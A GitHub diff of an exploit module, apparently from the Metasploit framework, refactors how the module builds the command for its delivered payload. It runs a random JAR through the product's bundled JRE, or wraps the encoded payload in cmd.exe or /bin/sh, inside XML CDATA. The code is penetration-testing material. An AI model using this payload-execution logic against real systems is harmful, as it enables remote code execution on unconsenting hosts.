File tree Expand file tree Collapse file tree 1 file changed +7
-6
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +7
-6
lines changed Original file line number Diff line number Diff line change @@ -113,22 +113,23 @@ def exploit
113113 jar_file = nil
114114 command = nil
115115
116- if target [ 'Platform' ] == 'java'
116+ case target [ 'Platform' ]
117+ when 'java'
117118 jar_path = "temp/#{ Rex ::Text . rand_text_alpha_lower ( 8 ) }
118119
119120 jar_file = payload . encoded_jar ( random : true )
120121
121122 # The product ships its own JRE, so we can use a relative path to run our Java JAR file.
122123 command = "jre/bin/java -jar \" #{ jar_path } \" "
123- elsif target [ 'Platform' ] == 'win'
124+ when 'win'
124125 command = "cmd.exe /c \" #{ payload . encoded } \" "
125- elsif ( target [ 'Platform' ] == ' linux') || ( target [ 'Platform' ] == ' unix')
126+ when ' linux', ' unix'
126127 command = "/bin/sh -c \" #{ payload . encoded } \" "
128+ else
129+ fail_with ( Failure ::BadConfig , 'Unsupported target platform' )
127130 end
128131
129- if command . nil?
130- fail_with ( Failure ::BadConfig , 'Unsupported target platform' )
131- elsif command . include? ']]>'
132+ if command . include? ']]>'
132133 # As we wrap the command in XML CDATA tags, we cannot have the closing CDATA tag in the command.
133134 fail_with ( Failure ::BadConfig , 'Payload cannot contain the CDATA closing tag "]]>"' )
134135 end
You can’t perform that action at this time.
0 commit comments